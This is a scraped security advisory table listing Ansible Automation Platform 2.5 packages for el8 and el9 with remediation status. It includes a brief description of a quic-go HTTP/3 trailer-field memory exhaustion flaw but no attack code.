Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
